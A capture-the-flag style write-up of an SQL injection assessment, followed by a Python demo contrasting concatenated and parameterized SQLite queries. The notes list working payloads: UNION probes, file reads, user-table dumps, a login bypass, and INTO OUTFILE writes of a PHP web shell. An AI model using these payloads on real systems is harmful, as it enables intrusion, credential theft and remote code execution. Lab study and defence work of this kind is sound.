🏗️ Skills Assessment - SQL Injection Fundamentals

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

' UNION SELECT 1,2,3,4,5-- -
' UNION SELECT 1,@@version,3,4,5-- -
' UNION SELECT 1,user(),3,4,5-- -
' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3,4,5-- -
' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -

So we don't have rights; I guess I have to switch users:

' UNION select 1,database(),3,4,5-- -
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
' UNION select 1,username,password,4,5 from ilfreight.users-- -

Let's go and connect as adam with the command adam'OR 1=1-- -

cn' union select 1,'<?php system($_REQUEST[0]); ?>',3,4,5 into outfile '/var/www/html/dashboard/payload.php'-- -

Big win 🎉
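Why the login input and the UNION probe above work, and what stops them, as an added example that is not part of the original notes or the assessed application. It assumes an in-memory SQLite database standing in for the MySQL backend, with a hypothetical `items` table and constructed rows; the `login_*` and `search_*` function names are also hypothetical.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in; table layout and rows are made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, c3 TEXT, c4 TEXT, c5 TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "adam", "constructed-hash-1"), (2, "other", "constructed-hash-2")])
    db.execute("INSERT INTO items VALUES (10, 'cnc router', 'a', 'b', 'c')")
    return db

def login_concat(db, username, password):
    # Weak: input is spliced into the SQL text, so a quote closes the literal
    # and the rest of the input is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

def login_param(db, username, password):
    # Fixed: placeholders keep the input as a value, never as SQL syntax.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

def search_concat(db, term):
    # Weak: same splicing problem in a five-column search query.
    sql = "SELECT * FROM items WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_param(db, term):
    # Fixed: the whole LIKE pattern is bound as one parameter.
    sql = "SELECT * FROM items WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    bypass = "adam'OR 1=1-- -"               # login input from the notes
    probe = "' UNION SELECT 1,2,3,4,5-- -"   # column-count probe from the notes
    print("concat login: ", login_concat(db, bypass, "x"))
    print("param login:  ", login_param(db, bypass, "x"))
    print("concat search:", search_concat(db, probe))
    print("param search: ", search_param(db, probe))
```

With bound parameters the same strings are compared as literal usernames and search terms, so the login returns no user and the search returns no rows.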
